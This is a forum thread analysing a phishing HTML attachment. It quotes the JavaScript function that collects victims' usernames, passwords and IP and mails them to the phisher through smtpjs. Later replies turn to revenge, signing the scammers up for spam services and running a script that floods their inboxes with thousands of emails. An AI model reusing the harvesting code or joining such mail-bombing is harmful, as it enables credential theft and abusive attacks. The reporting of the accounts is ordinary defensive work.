Overcomplicated Phishing Attempt

Got this email:

Attached was an html file, looking at the source (https://pastebin.com/jj4j7vwZ) it was obfuscated using document.write().

The rendered page is a pretty solid phishing page, except of course for the occasional diacritic/accent letters used to get around spam blockers.

Here is the function code used to harvest the credentials:


 function sendEmail() {
    if (document.getElementById('username').value === '') {
        alert('Username is Empty');
        return false;
    }
	if (document.getElementById('password').value === '') {
        alert('Password is Empty');
        return false;
    }
	var BTY = document.getElementById("Div11");
	var BTZ = document.getElementById("Div12");
	if (BTY.style.display === "block" && BTZ.style.display === "none") {
         BTY.style.display = "none";
	     BTZ.style.display = "block";
	 }
	setTimeout(function() {
	 var x = document.getElementById("Div1");
	 var y = document.getElementById("Div2");
     if (x.style.display === "block" && y.style.display === "none") {
         x.style.display = "none";
	     y.style.display = "block";
	 }
	}, 3000);
	document.getElementById('username2').value = document.getElementById('username').value;
    var username = document.getElementById('username').value;
	var password = document.getElementById('password').value;
	var usrip1 = document.getElementById('usrip1').value;
	Email.send({
    SecureToken : "0048d564-8e39-40f8-a0b9-25a716f9d4d7",
    To : '[email protected],[email protected]',
    From : "[email protected]",
    Subject : '3DD: IP: ' + usrip1,
    Body : '3DD: - Username: ' + username + ' || Password: ' + password
    }).then(message);
	}

So it takes the username and password you enter, as well as your ip address, and mails it to the phisher’s gmail and mail8b accounts, using smtpjs. The author appears to be legit but the script allows for encrypting the mail information (i.e. smtp server name and credentials) so I included the author in my report.

2 Likes

The pastebin seems to not be visible since they will moderate it first please put it on privatebin.net.

There might be more JavaScript code since the many variable are missing their declaration. Are there any <inputs> in the HTML code ?

2 Likes

Privatebin Link

yeah there’s a lot more, I just pulled out the code piece that is called by the submit button. There’s actually six seperate pages in there that load as you complete them, each one sends an email to the phisher.

2 Likes

What’s the link or file? Can just spam the scammers inbox by repeatedly resubmitting lol…

2 Likes

We can also sign his emails up to as many spam ad email services as possible lol

1 Like

image
These are the scammers 3 emails, right?

I think the bottom one is Nitz’s throwaway email

1 Like

@thenitz Can you confirm?

no it’s the scammers as well.

2 Likes

Understood - All 3 emails listed are the scammers.

1 Like

Anyone know of any good email spam sign up sites, particularly without verification?

1 Like

This one should be good.

2 Likes

This should be more readable. The code does not have any way to get user ip. Username and password need to be entered and then hit submit when the user clicks on them.

2 Likes

Thanks for the help! Fyi (to double check), do I have to signup with the scammers email address or???

yes You donot need to verify

1 Like

on it!! i’ll sign up with all 3 and start raining hell.
VPN on too lol.

image




Look for $.getJSON thats where the code that gets the ip address is.
I copied it into this form, but it causes a 403 error here :open_mouth:

Sorry I didnot see that but it will fill 4 hidden field in your browser and it will only send if the button is submitted.
Just in case remove the var ipx = data.ip or the entire script tag if your viewing it.

I did use this about 9 hrs ago but seems like they got alerted and renewed the secure token so it should not send any info to new victim if they open it.

This should in theory send them a email every 10 millisecond, I run it about 5 mins or 300000 millisecs atleast so there emails should be flooded with 30000 emails if smtpjs doesnot have a rate limit, not sure about gmail it might something to counter this.

Please send the email to the probably hosting company of email server monovm as their nameserver are used.

I have reported to elasticmail.com the service which they use to send the email in the phishing page and they say they have permanently banned the account.

mmm I should have thought of hijacking the secure token and sending myself a mail with it to see where it comes from. Oh well next time :smiley: